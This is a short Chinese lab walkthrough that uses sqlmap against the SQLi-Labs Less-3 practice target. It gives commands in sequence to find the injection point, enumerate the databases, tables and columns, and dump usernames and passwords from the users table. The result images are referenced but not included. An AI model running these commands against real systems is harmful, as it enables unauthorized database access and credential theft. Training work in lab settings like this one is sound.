1.访问SQLi-Labs网站Less-3
http://靶机ip/sql/Less-3
登录后,根据网页提示,先给定一个GET参数:
/http://靶机ip/sql/Less-3/?id=1
2.启动SQLmap
找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLmap:
python sqlmap.py -h
3.寻找注入点
输入命令自动寻找网站注入点,并获取网站及后台数据库的基本信息:
python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1
检测结果:
4.获取所有数据库的库名
(1)python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1 --dbs
检测结果如下:
(2)使用以下命令获取网站当前所在数据库的库名
python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 --current-db
检测结果如下图:
5.获取数据库中所有的表名
python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security --tables
检测结果如下图:
6.获取users表中的全部字段名
sqlmap> python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security -T users --columns
检测结果如下图:
7.获取users表id、username、password字段的全部值
python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security -T users -C id,username,password --dump
检测结果如下图: